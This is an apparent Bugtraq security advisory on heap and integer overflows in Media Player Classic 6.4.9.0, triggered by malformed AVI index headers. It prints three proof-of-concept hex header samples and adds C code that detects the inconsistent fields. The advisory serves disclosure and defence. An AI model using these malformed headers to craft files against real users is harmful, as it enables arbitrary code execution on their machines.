Media Player Classic Malformed AVI Header Multiple Remote Vulnerabilities
BID:25650
Info
| Bugtraq ID: | 25650 |
| Class: | Boundary Condition Error |
| CVE: | CVE-2007-4940 CVE-2007-4939 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 12 2007 12:00AM |
| Updated: | Jul 06 2016 02:17PM |
| Credit: | Code Audit Labs is credited with the discovery of this issue. |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Media Player Classic (MPC) is prone to multiple remote vulnerabilities, including a heap-based buffer-overflow issue and an integer-overflow issue, when handling malformed AVI files.
An attacker can exploit these issues to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
Media Player Classic 6.4.9.0 is vulnerable; other versions may also be affected.
Exploit / POC
To exploit these issues, an attacker must entice an unsuspecting user to open a maliciously crafted AVI file.
The following examples of AVI header data are available:
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx chunk size 0xffffffff
wLongsPerEntry 0x0001
bIndexSubType is 0x64
bIndexType is 0x73
nEntriesInUse is 0x10000020
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx chunk size 0xffffff00
wLongsPerEntry 0xffff
bIndexSubType is 0x64
bIndexType is 0x73
nEntriesInUse is 0xFFFFFFFF
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx chunk size 0xffffff00
wLongsPerEntry 0x0001
bIndexSubType is 0x64
bIndexType is 0x73
nEntriesInUse is 0x10000020
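A defensive consistency check for the indx header fields listed above, as an added example (not code from the advisory or from Media Player Classic). It assumes the OpenDML layout, in which 24 bytes of fixed fields precede the entries and each entry occupies wLongsPerEntry * 4 bytes; indx_check, the flag names and the zero-padded sample buffers are constructed for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Flags returned by indx_check(); 0 means the header is self-consistent. */
enum { INDX_SHORT = 1, INDX_TAG = 2, INDX_SIZE = 4, INDX_ENTRIES = 8 };
#define INDX_FIXED 24u /* assumed OpenDML fixed fields inside the chunk data */

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* buf points at the "indx" tag; avail is the number of file bytes left. */
unsigned indx_check(const uint8_t *buf, size_t avail)
{
    unsigned flags = 0;
    if (avail < 8 + INDX_FIXED) return INDX_SHORT;
    if (memcmp(buf, "indx", 4) != 0) return INDX_TAG;

    uint32_t cb    = le32(buf + 4);                            /* chunk size */
    uint32_t longs = (uint32_t)buf[8] | (uint32_t)buf[9] << 8; /* wLongsPerEntry */
    uint32_t n     = le32(buf + 12);                           /* nEntriesInUse */

    /* The declared chunk size may never exceed the bytes actually present. */
    uint64_t limit = avail - 8;
    if (cb > limit) flags |= INDX_SIZE; else limit = cb;

    /* 64-bit product: at most 2^32 * 2^16 * 4 = 2^50, so it cannot wrap. */
    uint64_t need = (uint64_t)n * longs * 4u;
    if (longs == 0 || limit < INDX_FIXED || need > limit - INDX_FIXED)
        flags |= INDX_ENTRIES;
    return flags;
}

/* Constructed inputs: the first two 16-byte headers from the advisory,
   zero-padded to 64 bytes, and a consistent header with two 16-byte entries. */
static const uint8_t sample1[64] = {0x69,0x6E,0x64,0x78,0xFF,0xFF,0xFF,0xFF,0x01,0x00,0x64,0x73,0x20,0x00,0x00,0x10};
static const uint8_t sample2[64] = {0x69,0x6E,0x64,0x78,0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0x64,0x73,0xFF,0xFF,0xFF,0xFF};
static const uint8_t benign[64]  = {0x69,0x6E,0x64,0x78,56,0,0,0,4,0,0,0,2,0,0,0};

int main(void)
{
    printf("%u %u %u\n", indx_check(sample1, sizeof sample1),
           indx_check(sample2, sizeof sample2), indx_check(benign, sizeof benign));
    return 0;
}
```

Both advisory headers are flagged twice: the chunk size exceeds the data present, and the entry table implied by nEntriesInUse and wLongsPerEntry does not fit in the chunk.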
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- Media Player Classic Homepage (guliverkli)
- CAL-20070730-1 BlueSkyCat ActiveX Remote Heap Overflow vulnerability (Code Audit Labs)